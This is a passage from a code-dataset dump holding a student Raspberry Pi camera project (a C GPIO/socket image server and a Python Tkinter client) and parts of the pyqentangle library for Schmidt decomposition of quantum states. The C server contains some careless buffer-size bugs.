pin)\n{\n\tchar buffer[BUFFER_MAX];\n\tssize_t bytes_written;\n\tint fd;\n\n\tfd = open(\"/sys/class/gpio/unexport\", O_WRONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open unexport for writing!\\n\");\n\t\treturn(-1);\n\t}\n\n\tbytes_written = snprintf(buffer, BUFFER_MAX, \"%d\", pin);\n\twrite(fd, buffer, bytes_written);\n\tclose(fd);\n\treturn(0);\n}\n\nstatic int\nGPIODirection(int pin, int dir)\n{\n\tstatic const char s_directions_str[] = \"in\\0out\";\n\n#define DIRECTION_MAX 35\n\tchar path[DIRECTION_MAX];\n\tint fd;\n\n\tsnprintf(path, DIRECTION_MAX, \"/sys/class/gpio/gpio%d/direction\", pin);\n\tfd = open(path, O_WRONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open gpio direction for writing!\\n\");\n\t\treturn(-1);\n\t}\n\n\tif (-1 == write(fd, &s_directions_str[IN == dir ? 0 : 3], IN == dir ? 2 : 3)) {\n\t\tfprintf(stderr, \"Failed to set direction!\\n\");\n\t\treturn(-1);\n\t}\n\n\tclose(fd);\n\treturn(0);\n}\n\nstatic int\nGPIORead(int pin)\n{\n#define VALUE_MAX 30\n\tchar path[VALUE_MAX];\n\tchar value_str[3];\n\tint fd;\n\n\tsnprintf(path, VALUE_MAX, \"/sys/class/gpio/gpio%d/value\", pin);\n\tfd = open(path, O_RDONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open gpio value for reading!\\n\");\n\t\treturn(-1);\n\t}\n\n\tif (-1 == read(fd, value_str, 3)) {\n\t\tfprintf(stderr, \"Failed to read value!\\n\");\n\t\treturn(-1);\n\t}\n\n\tclose(fd);\n\n\treturn(atoi(value_str));\n}\n\nstatic int\nGPIOWrite(int pin, int value)\n{\n\tstatic const char s_values_str[] = \"01\";\n\n\tchar path[VALUE_MAX];\n\tint fd;\n\n\tsnprintf(path, VALUE_MAX, \"/sys/class/gpio/gpio%d/value\", pin);\n\tfd = open(path, O_WRONLY);\n\tif (-1 == fd) {\n\t\tfprintf(stderr, \"Failed to open gpio value for writing!\\n\");\n\t\treturn(-1);\n\t}\n\n\tif (1 != write(fd, &s_values_str[LOW == value ? 0 : 1], 1)) {\n\t\tfprintf(stderr, \"Failed to write value!\\n\");\n\t\treturn(-1);\n\t}\n\n\tclose(fd);\n\treturn(0);\n}\n\n\n//Writes file size and file data to the socket\nvoid write_to_socket(char* file_name, int sockfd)\n{\n FILE* fp;\n \n if((fp = fopen(file_name,\"rb\")) == NULL)\n\t{\n printf(\"Error I guess? %s\\n\",strerror(errno));}\n //printf(\"Cannot open file\\n\");\n \n\t fseeko(fp,0,SEEK_END);\n\t int sz = ftello(fp);\n\t fseeko(fp,0,SEEK_SET);\n\t \n\t char sizeBuf[256];\n\t \n\t sprintf(sizeBuf,\"%d\",sz);\n\n\t write(sockfd,sizeBuf,256);\n\t int n;\n\t while(1)\n \t{\n\t \tunsigned char buf[256] = {0};\n\t int n = fread(buf,1,256,fp);\n\t\t \n\t\t if(n>0)\n\t\t\t\t{\n\t\t \t\t\twrite(sockfd,buf,n);\n\t\t\t\t}\n \n\t\t\tif(n<256)\n\t\t\t\t{\n\t \t\t\t\tif(feof(fp))\n\t\t\t\t printf(\"Finished sending: %s\\n\",file_name);\n\t\t\t\t \tbreak;\n\t\t\t\t}\n \t\t}\n \tfclose(fp);\n\n}\n \n//Writes file info to the catalog.\nvoid write_to_catalog(char* file_name, int file_size, unsigned char* sum)\n{\n int i;\n \n FILE* fp;\n fp = fopen(logpath,\"a\");\n fprintf(fp,\"%s\",file_name);\n fprintf(fp,\",\");\n fprintf(fp,\"%d\",file_size);\n fprintf(fp,\",\");\n for(i=0;i<MD5_DIGEST_LENGTH;i++)\n {\n fprintf(fp,\"%02x\",sum[i]);\n }\n fprintf(fp,\"%s\\n\",\" \");\n fclose(fp);\n}\n\nint is_jpeg(char* file_name)\n{\n if(strstr(file_name,\"jpeg\")) return 1;\n return 0;\n}\n\n//Adds files to the corresponding arrays.\nvoid addToArray(char* file_path)\n{\n if(is_jpeg(file_path))\n {\n jpeg_array[jpeg_count] = file_path;\n jpeg_count++;\n }\n //jpeg_count = 10;\n \n file_array[file_count] = file_path;\n file_count++;\n}\n\n//Recursively finds images in directories and sub-directories\nint find_images(char* in_dir,char* catpath)\n{\n DIR* indir;\n struct dirent* file;\n \n if((indir=opendir(in_dir)) == NULL)\n {\n perror(\"Unable to open target directory\\n\");\n exit(1);\n }\n \n while((file = readdir(indir))!=NULL)\n {\n if((file->d_name[0]) == '.') continue;\n \n if(file->d_type == DT_DIR)\n\t\t{\n\t\t \n\t\t char* path2 = malloc(200);\n\t\t strcpy(path2,in_dir);\n\t\t strcat(path2,\"/\");\n\t\t strcat(path2,file->d_name);\n\t\t find_images(path2,catpath);\n\t\t}\n \n if(is_jpeg(file->d_name))\n\t\t{\n\t\t char* file_path = malloc(200);\n\t\t strcpy(file_path,in_dir);\n\t\t strcat(file_path,\"/\");\n\t\t strcat(file_path,file->d_name);\n\t\t \n\t\t unsigned char sum[MD5_DIGEST_LENGTH];\n\t\t int i;\n\t\t addToArray(file_path);\n\t\t md5sum(file_path,sum);\n\t\t \n\t\t struct stat st = {0};\n\t\t \n\t\t stat(file_path,&st);\n\t\t \n\t\t write_to_catalog(file->d_name,(int)st.st_size,sum);\n\t\n\t\t}\n\t}\n return 0;}\n\n\nint main(int argc, char* argv[])\n{\n \n\tif(argc!=3)\n\t{\n\t\tperror(\"Incorrect number of arguments\\n\");\n\t\tperror(\"Usage: ./server <port_number> <directory>\\n\");\n\t\texit(1);\n\t}\n\n\t/*********** Define GPIO ***************/\n\t//Enable GPIO pins\n\tif (-1 == GPIOExport(PINCONNECT) || -1 == GPIOExport(PINTRANSFER))\n\t\treturn(1);\n\n\t//Set GPIO directions\n\tif (-1 == GPIODirection(PINCONNECT, OUT) || -1 == GPIODirection(PINCONNECT, OUT))\n\t\treturn(2);\n\n\t/**************************************/\n\n\tlogpath = malloc(200);\n\n\n\tstrcpy(logpath,argv[2]);\n\tstrcat(logpath,\"/\");\n\tstrcat(logpath,\"catalog.csv\");\n\n\n\tstruct stat st = {0};\n\n\tif(stat(logpath,&st) !=-1)\n\t{\n\t\tperror(\"Catalog file exists. Deleting it.\\n\");\n\t\tremove(logpath);\n\t\tFILE* fp;\n\t\tfp = fopen(logpath,\"a+\");\n\t\tperror(\"catalog.csv created\\n\");\n\t\tfclose(fp);\n\t}\n\n\telse\n\t{\n\t \n\t FILE* fp;\n\t fp = fopen(logpath,\"a+\");\n\t perror(\"catalog.csv created\\n\");\n\t fclose(fp);\n\t}\n\n\n\tFILE* fp;\n\tfp = fopen(logpath,\"a+\");\n\n\tfprintf(fp,\"File name,Size,Sum\\n\");\n\tfclose(fp);\n\tint i;\n\tint result;\n\n\tif((result=find_images(argv[2],logpath))!=0)\n\tprintf(\"Error finding images\\n\");\n\n\tint listenfd;\n\tint confd;\n\n\tstruct sockaddr_in serv_addr;\n\n\tchar sendBuff[1025];\n\tlistenfd = socket(AF_INET, SOCK_STREAM, 0);\n\n\tmemset(&serv_addr,'0',sizeof(serv_addr));\n\tmemset(sendBuff,'0',sizeof(sendBuff));\n\n\tserv_addr.sin_family = AF_INET;\n\tserv_addr.sin_addr.s_addr = htonl(INADDR_ANY);\n\tserv_addr.sin_port = htons(atoi(argv[1]));\n\n\tbind(listenfd,(struct sockaddr*)&serv_addr, sizeof(serv_addr));\n\n\tif(listen(listenfd,10) == -1)\n\t{\n\t\tperror(\"Could not listen\\n\");\n\t\treturn -1;\n\t}\n\n\twhile(1)\n\t{\n\n\t\tprintf(\"Listening for clients...\\n\");\n\n\t\tconfd = accept(listenfd, (struct sockaddr*)NULL, NULL);\n\n\t\tint n;\n\n\t\tchar buf[10];\n\n\t\tprintf(\"accepted a connection\\n\");\n\n\t\t//PINCONNECT ON\n\t\tif (-1 == GPIOWrite(PINCONNECT, 15))\n\t\t\treturn(3);\n \n\t\twrite_to_socket(logpath,confd);\n\n\t\tread(confd,buf,11);\n\n\n\t\tif(is_jpeg(buf))\n\t {\n\t\t\tprintf(\"Client in passive mode. Requesting %s files:\\n\",buf);\n\t \n\t\t\tif(is_jpeg(buf))\n\t\t\t{\n\n\n\t\t\t\tif (-1 == GPIOWrite(PINTRANSFER, 15))\n\t\t\t\t\treturn(4);\n\n\t\t\t\tfor(i=0;i<jpeg_count;i++){\n\n\t\t\t\t\tchar buffer[4];\n\t\t\t\t\tread(confd,buffer,5);\n\t\t\t\t \n\t\t\t\t \tif(strstr(buffer,\"ready\"))\n\t\t\t\t\t\t\twrite_to_socket(jpeg_array[i],confd);\n\n\t\t\t\t}\n\t\t\t}\n\t }\n\t \n \n //sleep(1);\n \n\t\treturn 0;\n\t}\n\n\tclose(confd);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5404740571975708, "alphanum_fraction": 0.5565742254257202, "avg_line_length": 33.94140625, "blob_id": "01a4da03321eb61ffb3234774da5a2cdfc917744", "content_id": "be143ae5bdfeb4039ea859bac7d69c2436f19a87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8948, "license_type": "no_license", "max_line_length": 131, "num_lines": 256, "path": "/project/src/Client.py", "repo_name": "Bulowl/Camera_2019", "src_encoding": "UTF-8", "text": "import socket\nimport sys\nimport getopt\nfrom tkinter import *\nfrom tkinter.ttk import *\nfrom tkinter.messagebox import *\nimport matplotlib\nmatplotlib.use(\"Agg\")\nfrom matplotlib.backends.backend_tkagg import (\n FigureCanvasTkAgg, NavigationToolbar2Tk)\n\n# Implement the default Matplotlib key bindings.\nfrom matplotlib.backend_bases import key_press_handler\nfrom matplotlib.figure import Figure\nfrom matplotlib.pyplot import imshow,figure\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport signal\nimport syslog\nsyslog.openlog(\"Client_Camera\")\nprint(\"Message are logged in /var/log/syslog\")\n\n\nTAILLE_IMAGE = 40*480*3*8 #Taille du Buffer pour la recuperation\n\ngreen_on = 17 \ngreen_off = 170\nred_on = 18\nred_off = 180\n\n\n\n\nclass GUI(Tk):\n def __init__(self,IP=\"172.20.21.162\", port_serveur_led = 9000, port_serveur_camera = 7000):\n super().__init__()\n self.fig = Figure(figsize=(5, 4), dpi=100)\n self.ax = self.fig.add_subplot(111)\n self.canvas = FigureCanvasTkAgg(self.fig, master=self)\n self.data=[]\n self.quit_info = 0\n self.capture = 0 \n self.camera_connected = 0\n self.led_connected = 0\n self.receiving = 0\n\n self.Frame = Frame(self, borderwidth=2,relief = GROOVE)\n\n self.Frame.pack(side = TOP)\n\n self.b_quit = Button(master=self.Frame, text=\"Quit\", command=self._quit)\n self.b_quit.pack(side=BOTTOM)\n\n self.b_switch = Button(self.Frame,text=\"Capture\",command=self.switch)\n self.b_switch.pack(side=BOTTOM) \n \n blank = np.zeros((480,640))\n self.ax.imshow(blank,cmap = \"gray\")\n self.canvas.get_tk_widget().pack(side=TOP, fill=BOTH, expand=1) \n\n self.cam = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_address_cam = (IP, port_serveur_camera)\n self.wait_cam_i = 0\n self.wait_cam()\n self.runtime()\n\n self.led = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.server_address_led = (IP, port_serveur_led)\n self.wait_led_i=0\n self.wait_led()\n\n def _quit(self):\n try:\n print(\"Quitting program\")\n except :\n pass\n self.cam.close()\n self.quit() \n self.destroy() \n \n def image(self):\n image = []\n number = 0\n \n for i in range(len(self.image_recupe)):\n if self.image_recupe[i]!=59:\n number = number *10 + int(self.image_recupe[i]-48)\n else:\n image.append(number)\n number = 0\n image = np.array(image[2:640*480+2]).reshape((480,640)) #recuperation de l image parmi les données envoyées\n self.ax.clear()\n self.ax.imshow(image,cmap='gray')\n self.canvas.draw()\n \n def wait_cam(self):\n if self.quit_info:\n self._quit()\n print(\"Try number \",self.wait_cam_i,\" for camera\")\n self.cam.settimeout(None)\n try:\n self.cam.settimeout(10)\n self.cam.connect(self.server_address_cam)\n print('connecting to {} port {}'.format(*self.server_address_cam))\n self.cam.send(b\"0\")\n syslog.syslog(syslog.LOG_INFO, 'connecting to {} port {}'.format(*self.server_address_cam))\n self.wait_cam_i = 0\n self.camera_connected = 1\n self.led_cam[\"background\"] = \"lawn green\"\n print(\"Connection Established with camera\")\n syslog.syslog(syslog.LOG_INFO, 'Connection Established with camera')\n except Exception as e:\n print(e)\n if self.camera_connected:\n self.led_cam[\"background\"] = \"red\"\n self.camera_connected = 0\n if self.wait_cam_i>10:\n print(\"Time Out\")\n syslog.syslog(syslog.LOG_ERR, \"Time Out\")\n #self._quit()\n else:\n self.wait_cam_i+=1\n self.after(10000,self.wait_cam)\n\n #Fonction pour attendre un connexion entre le camera et led\n def wait_led(self):\n if self.quit_info:\n self._quit()\n print(\"Try number \",self.wait_led_i,\" for led\")\n self.led.settimeout(20)\n try:\n self.led.settimeout(10)\n self.led.connect(self.server_address_led)\n print('connecting to {} port {}'.format(*self.server_address_led))\n syslog.syslog(syslog.LOG_INFO, 'connecting to {} port {}'.format(*self.server_address_led))\n self.wait_led_i = 0 \n self.led_connected = 1\n print(\"Connection Established with servomotor\")\n syslog.syslog(syslog.LOG_INFO, 'Connection Established with servomotor')\n except:\n if self.led_connected:\n self.led_connected = 0\n if self.wait_led_i>10:\n print(\"Time Out\")\n syslog.syslog(syslog.LOG_ERR, \"Time Out\")\n #self._quit()\n else:\n self.wait_led_i+=1\n self.after(10000,self.wait_led)\n \n\n def runtime(self):\n self.runtime_camera() #Fonction appelee toutes les 40ms pour l envoi et la reception de données avec la caméra\n \n def runtime_camera(self):\n if self.camera_connected:\n if not self.led_connected :\n self.wait_led()\n self.led.send(bytes([green_on]))\n try:\n if not self.capture or self.receiving:\n self.cam.send(b\"0\")\n else:\n self.cam.send(b\"1\")\n except :\n self.wait_cam()\n\n self.data = self.cam.recv(TAILLE_IMAGE)\n if self.data != b'empty' and not self.receiving:\n self.receiving = 1\n self.image_recupe = np.array([])\n self.led.send(bytes([red_off]))\n\n\n if self.data==b'empty':\n if self.receiving:\n self.image()\n self.led.send(bytes([red_on]))\n self.receiving = 0\n\n if self.receiving:\n temp = np.array([self.data[i] for i in range(len(self.data))])\n self.image_recupe = np.concatenate((self.image_recupe,temp))\n else:\n self.wait_cam()\n\n if self.quit_info:\n self.led.send(bytes([green_off]))\n self._quit()\n\n self.after(40,self.runtime_camera)\n\n def signal_handler(self,sig, frame):\n if (sig==signal.SIGINT or sig==signal.SIGTSTP or sig==sig.SIGTERM):\n self.quit_info = 1\n syslog.syslog(syslog.LOG_ERR, \"SIGINT signal received\")\n\n #Permet de lancer ou d arreter la capture\n def switch(self):\n if self.capture:\n self.capture = 0\n self.b_switch[\"text\"]=\"Capture\"\n else:\n self.capture = 1\n self.b_switch[\"text\"]=\"Stop\"\n\n\n\nif __name__ == \"__main__\":\n print(\"Launching \" + sys.argv[0])\n IP = \"172.20.21.162\"\n port_camera = 7000\n syslog.syslog(syslog.LOG_INFO, \"Launching \" + sys.argv[0] + \"\\n\")\n try:\n opts, args = getopt.getopt(sys.argv[1:], \"h:i:s:c\", [\"help=\", \"ip=\", \"port_camera=\"])\n except getopt.GetoptError as err:\n print(err)\n print(\"\\n\")\n print(\"Wrong arguments or Not enough arguments\")\n print(\"Usage :\")\n print(\"Capture -i ip -c port_camera\")\n print(\" or \")\n print(\"Capture -ip ip -port_camera port_camera\")\n print(\"Quitting the program!\")\n syslog.syslog(syslog.LOG_ERR, \"Quitting the program!\\n\")\n sys.exit(2)\n print(opts)\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n print(\"Options and arguments : \")\n print(\"-h or --help | Display this help message\")\n print(\"-i or --ip | Default is localhost. Ip Address of the RPi on which the server is running. \")\n print(\"-c or --port_camera | Default is 7000. Port of the RPi on which the server managing the camera is running\")\n print(\"\\n\")\n print(\"Usage :\")\n print(\"Capture -i ip -c port_camera\")\n print(\" or \")\n print(\"Capture -ip ip -port_camera port_camera\")\n print(\"Quitting the program!\")\n syslog.syslog(syslog.LOG_ERR, \"Quitting the program!\\n\")\n sys.exit()\n elif o in (\"-i\", \"--ip\"):\n IP = a\n elif o in (\"-c\", \"--port_camera\"):\n port_camera = int(a)\n else:\n assert False, \"unhandled option\"\n print(\"Quitting the program!\")\n syslog.syslog(syslog.LOG_ERR, \"Quitting the program!\\n\")\n sys.exit(1)\n\n interface = GUI(IP, port_camera)\n signal.signal(signal.SIGINT, interface.signal_handler)\n signal.signal(signal.SIGTSTP, interface.signal_handler)\n signal.signal(signal.SIGTERM, interface.signal_handler)\n interface.mainloop()" } ]
5
Hosseinberg/pyqentangle_Hosseinberg
https://github.com/Hosseinberg/pyqentangle_Hosseinberg
372db0e4c399d196314a7bbf9818760cd06b9f1a
fb4e48c314ccec3c3740a5db422434e916b2038c
ed6e414b70182a110296552faf44336383f7851a
refs/heads/master
2020-04-28T08:31:08.316091
2019-03-20T06:35:05
2019-03-20T06:35:05
175,130,563
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7379899621009827, "alphanum_fraction": 0.7432950139045715, "avg_line_length": 47.4571418762207, "blob_id": "a9e3781e84086898ec2f76f7edaaf33b428a9f61", "content_id": "be50cd3697930d36b7b96d32d28a7ad2edfffc6f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3393, "license_type": "permissive", "max_line_length": 140, "num_lines": 70, "path": "/pyqentangle/schmidt.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nfrom .bipartite_reddenmat_nocheck import bipartitepurestate_reduceddensitymatrix_nocheck\nfrom .bipartite_denmat import bipartitepurestate_densitymatrix_cython\n\n\n# total density matrix\ndef bipartitepurestate_densitymatrix(bipartitepurestate_tensor):\n \"\"\"Calculate the whole density matrix of the bipartitite system\n\n Given a discrete normalized quantum system, given in terms of 2-D numpy array ``bipartitepurestate_tensor``,\n each element of ``bipartitepurestate_tensor[i, j]`` is the coefficient of the ket :math:`|ij\\\\rangle`,\n calculate the whole density matrix.\n\n :param bipartitepurestate_tensor: tensor describing the bi-partitite states, with each elements the coefficients for :math:`|ij\\\\rangle`\n :return: density matrix\n :type bipartitepurestate_tensor: numpy.ndarray\n :rtype: numpy.ndarray\n\n \"\"\"\n return bipartitepurestate_densitymatrix_cython(bipartitepurestate_tensor)\n\n\ndef bipartitepurestate_reduceddensitymatrix(bipartitepurestate_tensor, kept):\n \"\"\"Calculate the reduced density matrix for the specified subsystem\n\n Given a discrete normalized quantum system, given in terms of 2-D numpy array ``bipartitepurestate_tensor``,\n each element of ``bipartitepurestate_tensor[i, j]`` is the coefficient of the ket :math:`|ij\\\\rangle`,\n calculate the reduced density matrix of the specified subsystem.\n\n :param bipartitepurestate_tensor: tensor describing the bi-partitite states, with each elements the coefficients for :math:`|ij\\\\rangle`\n :param kept: subsystem, 0 indicating the first subsystem; 1 the second\n :return: reduced density matrix of the specified subsystem\n :type bipartitepurestate_tensor: numpy.ndarray\n :type kept: int\n :rtype: numpy.ndarray\n\n \"\"\"\n if not (kept in [0, 1]):\n raise ValueError('kept can only be 0 or 1!')\n return bipartitepurestate_reduceddensitymatrix_nocheck(bipartitepurestate_tensor, kept)\n\n\ndef schmidt_decomposition(bipartitepurestate_tensor):\n \"\"\"Calculate the Schmidt decomposition of the given discrete bipartite quantum system\n\n Given a discrete normalized quantum system, given in terms of 2-D numpy array ``bipartitepurestate_tensor``,\n each element of ``bipartitepurestate_tensor[i, j]`` is the coefficient of the ket :math:`|ij\\\\rangle`,\n calculate its Schmidt decomposition, returned as a list of tuples, where each tuple contains\n the Schmidt coefficient, the vector of eigenmode of first subsystem, and the vector of the eigenmode of\n second subsystem.\n\n :param bipartitepurestate_tensor: tensor describing the bi-partitite states, with each elements the coefficients for :math:`|ij\\\\rangle`\n :return: list of tuples containing the Schmidt coefficient, eigenmode for first subsystem, and eigenmode for second subsystem\n :type bipartitepurestate_tensor: numpy.ndarray\n :rtype: list\n\n \"\"\"\n state_dims = bipartitepurestate_tensor.shape\n mindim = np.min(state_dims)\n\n vecs1, diags, vecs2_h = np.linalg.svd(bipartitepurestate_tensor)\n vecs2 = vecs2_h.transpose()\n #decomposition = [(diags[k]*diags[k], vecs1[:, k], transposevecs2[:, k])\n # for k in range(mindim)]\n decomposition = [(diags[k], vecs1[:, k], vecs2[:, k])\n for k in range(mindim)]\n\n decomposition = sorted(decomposition, key=lambda dec: dec[0], reverse=True)\n\n return decomposition\n" }, { "alpha_fraction": 0.665901243686676, "alphanum_fraction": 0.6946039199829102, "avg_line_length": 27.064516067504883, "blob_id": "37c2e7985653acbded72ebe8ebea3b5051a7f1d1", "content_id": "0d4e8959828329b1d8da8769276d27ff272ee165", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 871, "license_type": "permissive", "max_line_length": 106, "num_lines": 31, "path": "/doc/index.rst", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": ".. PyQEntangle documentation master file, created by\n sphinx-quickstart on Fri Nov 11 13:36:37 2016.\n You can adapt this file completely to your liking, but it should at least\n contain the root `toctree` directive.\n\nWelcome to PyQEntangle's documentation!\n=======================================\n\nThis is the PyQEntangle project, which provides routine to perform Schmidt decomposition\nfor quantum entangled states. The states have to be bipartite, i.e., containing two\nsubsystems. The two subsystems can be either discrete or continuous.\n\nNote: the releases 2.x is incompatible with releases 1.x.\n\nThis package runs in Python 2.7, 3.5, 3.6, and 3.7. However, under Python 3.7, Cython has to be installed.\n\nContents:\n\n.. toctree::\n :maxdepth: 2\n\n code\n links\n ref\n\nIndices and tables\n==================\n\n* :ref:`genindex`\n* :ref:`modindex`\n* :ref:`search`\n\n" }, { "alpha_fraction": 0.6551980972290039, "alphanum_fraction": 0.6754542589187622, "avg_line_length": 38.95833206176758, "blob_id": "05a5b63426c2793ff480b90182575675e3167c85", "content_id": "1ef22478f7d36ce430d59d1cc385f24a7ca9899b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6714, "license_type": "permissive", "max_line_length": 197, "num_lines": 168, "path": "/pyqentangle/continuous.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "\nfrom itertools import product\n\nimport numpy as np\n\nfrom .interpolate_nocheck import numerical_continuous_interpolation_nocheck_cython\nfrom . import schmidt_decomposition\n\ndisentangled_gaussian = lambda x1, x2: np.exp(-0.5 * (x1 * x1 + x2 * x2)) / np.sqrt(np.pi)\n\n\nclass OutOfRangeException(Exception):\n def __init__(self, value):\n self.msg = \"Out of range: \" + str(value)\n\n def __str__(self):\n return repr(self.msg)\n\n\nclass UnequalLengthException(Exception):\n def __init__(self, array1, array2):\n self.msg = \"Unequal length: \" + str(len(array1)) + \" vs. \" + str(len(array2))\n\n def __str__(self):\n return repr(self.msg)\n\n\ndef numerical_continuous_interpolation(xarray, yarray, x):\n \"\"\"Evaluate the value of a function given a variable x using interpolation\n\n With a function approximated by given arrays of independent variable (`xarray`)\n and of dependent variable (`yarray`), the value of this function given `x` is\n calculated by interpolation.\n\n If `x` is outside the range of `xarray`, an `OutOfRangeException`\n is raised; if the lengths of `xarray` and `yarray` are not equal, an\n `UnequalLengthException` is raised.\n\n :param xarray: an array of independent variable values\n :param yarray: an array of dependent variable values\n :param x: the input value at where the function is computed at\n :return: the value of function with the given `x`\n :type xarray: numpy.ndarray\n :type yarray: numpy.ndarray\n :rtype: float\n :raises: OutOfRangeException, UnequalLengthException\n \"\"\"\n if len(xarray) != len(yarray):\n raise UnequalLengthException(xarray, yarray)\n minx = np.min(xarray)\n maxx = np.max(xarray)\n if x == maxx:\n return yarray[-1]\n if not (x >= minx and x < maxx):\n raise OutOfRangeException(x)\n\n return numerical_continuous_interpolation_nocheck_cython(xarray, yarray, x)\n\n\ndef numerical_continuous_function(xarray, yarray):\n \"\"\"Return a function with the given arrays of independent and dependent variables\n\n With a function approximated by given arrays of independent variable (`xarray`)\n and of dependent variable (`yarray`), it returns a lambda function that takes\n a `numpy.ndarray` as an input and calculates the values at all these elements\n using interpolation.\n\n If `x` is outside the range of `xarray`, an `OutOfRangeException`\n is raised.\n\n :param xarray: an array of independent variable values\n :param yarray: an array of dependent variable values\n :return: a lambda function that takes a `numpy.ndarray` as the input parameter and calculate the values\n :type xarray: numpy.ndarray\n :type yarray: numpy.ndarray\n :rtype: function\n :raises: OutOfRangeException\n \"\"\"\n return lambda xs: np.array(list(map(lambda x: numerical_continuous_interpolation(xarray, yarray, x), xs)))\n\n\ndef discretize_continuous_bipartitesys(fcn, x1_lo, x1_hi, x2_lo, x2_hi, nb_x1=100, nb_x2=100):\n \"\"\"Find the discretized representation of the continuous bipartite system\n\n Given a function `fcn` (a function with two input variables),\n find the discretized representation of the bipartite system, with\n the first system ranges from `x1_lo` to `x1_hi`, and second from `x2_lo` to `x2_hi`.\n\n :param fcn: function with two input variables\n :param x1_lo: lower bound of :math:`x_1`\n :param x1_hi: upper bound of :math:`x_1`\n :param x2_lo: lower bound of :math:`x_2`\n :param x2_hi: upper bound of :math:`x_2`\n :param nb_x1: number of :math:`x_1` (default: 100)\n :param nb_x2: number of :math:`x_2` (default: 100)\n :return: discretized tensor representation of the continuous bipartite system\n :type fcn: function\n :type x1_lo: float\n :type x1_hi: float\n :type x2_lo: float\n :type x2_hi: float\n :type nb_x1: int\n :type nb_x2: int\n :rtype: numpy.ndarray\n\n \"\"\"\n x1 = np.linspace(x1_lo, x1_hi, nb_x1)\n x2 = np.linspace(x2_lo, x2_hi, nb_x2)\n tensor = np.zeros((len(x1), len(x2)))\n for i, j in product(*map(range, tensor.shape)):\n tensor[i, j] = fcn(x1[i], x2[j])\n return tensor\n\n\ndef continuous_schmidt_decomposition(fcn, x1_lo, x1_hi, x2_lo, x2_hi, nb_x1=100, nb_x2=100, keep=None):\n \"\"\"Compute the Schmidt decomposition of a continuous bipartite quantum systems\n\n Given a function `fcn` (a function with two input variables), perform the Schmidt\n decomposition, returning a list of tuples, where each contains a Schmidt decomposition,\n the lambda function of the eigenmode in the first subsystem, and the lambda function\n of the eigenmode of the second subsystem.\n\n :param fcn: function with two input variables\n :param x1_lo: lower bound of :math:`x_1`\n :param x1_hi: upper bound of :math:`x_1`\n :param x2_lo: lower bound of :math:`x_2`\n :param x2_hi: upper bound of :math:`x_2`\n :param nb_x1: number of :math:`x_1` (default: 100)\n :param nb_x2: number of :math:`x_2` (default: 100)\n :param keep: the number of Schmidt modes with the largest coefficients to return; the smaller of `nb_x1` and `nb_x2` will be returned if `None` is given. (default: `None`)\n :return: list of tuples, where each contains a Schmidt coefficient, the lambda function of the eigenmode of the first subsystem, and the lambda function of the eigenmode of the second subsystem\n :type fcn: function\n :type x1_lo: float\n :type x1_hi: float\n :type x2_lo: float\n :type x2_hi: float\n :type nb_x1: int\n :type nb_x2: int\n :type keep: int\n :rtype: list\n\n \"\"\"\n tensor = discretize_continuous_bipartitesys(fcn, x1_lo, x1_hi, x2_lo, x2_hi, nb_x1=nb_x1, nb_x2=nb_x2)\n decomposition = schmidt_decomposition(tensor)\n\n if keep == None or keep > len(decomposition):\n keep = len(decomposition)\n\n x1array = np.linspace(x1_lo, x1_hi, nb_x1)\n x2array = np.linspace(x2_lo, x2_hi, nb_x2)\n dx1 = (x1_hi - x1_lo) / (nb_x1 - 1.)\n dx2 = (x2_hi - x2_lo) / (nb_x2 - 1.)\n\n renormalized_decomposition = []\n #s = list(map(lambda item: item[0], decomposition))\n sumeigvals = np.sum(list(map(lambda dec: dec[0], decomposition)))\n #sumeigvals = np.sum(list(map(lambda i: s[i]**2, range(keep))))\n for i in range(keep):\n schmidt_weight, unnorm_modeA, unnorm_modeB = decomposition[i]\n normA = np.linalg.norm(unnorm_modeA) * np.sqrt(dx1)\n normB = np.linalg.norm(unnorm_modeB) * np.sqrt(dx2)\n renormalized_decomposition.append(\n ( (schmidt_weight / sumeigvals),\n numerical_continuous_function(x1array, unnorm_modeA / normA),\n numerical_continuous_function(x2array, unnorm_modeB / normB)\n )\n )\n\n return renormalized_decomposition\n" }, { "alpha_fraction": 0.6909643411636353, "alphanum_fraction": 0.698177695274353, "avg_line_length": 35.0684928894043, "blob_id": "37f26b28c8ddd957a9cc29044fc058e4f2467316", "content_id": "200014dccf4ddb68c518ef941546d8e71533ced4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2634, "license_type": "permissive", "max_line_length": 152, "num_lines": 73, "path": "/pyqentangle/metrics.py", "repo_name": "Hosseinberg/pyqentangle_Hosseinberg", "src_encoding": "UTF-8", "text": "\nimport numpy as np\nfrom .negativity_utils import bipartitepurestate_partialtranspose_subsys0_densitymatrix_cython\nfrom .negativity_utils import bipartitepurestate_partialtranspose_subsys1_densitymatrix_cython\nfrom .bipartite_denmat import flatten_bipartite_densitymatrix_cython\n\n\ndef schmidt_coefficients(schmidt_modes):\n \"\"\" Retrieving Schmidt coefficients from Schmidt modes.\n\n :param schmidt_modes: Schmidt modes\n :return: Schmidt coefficients\n :type schmidt_modes: list\n :rtype: numpy.array\n \"\"\"\n return np.array([mode[0] for mode in schmidt_modes])\n\n\ndef entanglement_entropy(schmidt_modes):\n \"\"\"Calculate the entanglement entropy\n\n Given the calculated Schmidt modes, compute the entanglement entropy\n with the formula :math:`H=-\\\\sum_i p_i \\log p_i`.\n\n :param schmidt_modes: Schmidt modes\n :return: the entanglement entropy\n :type schmidt_modes: list\n :rtype: 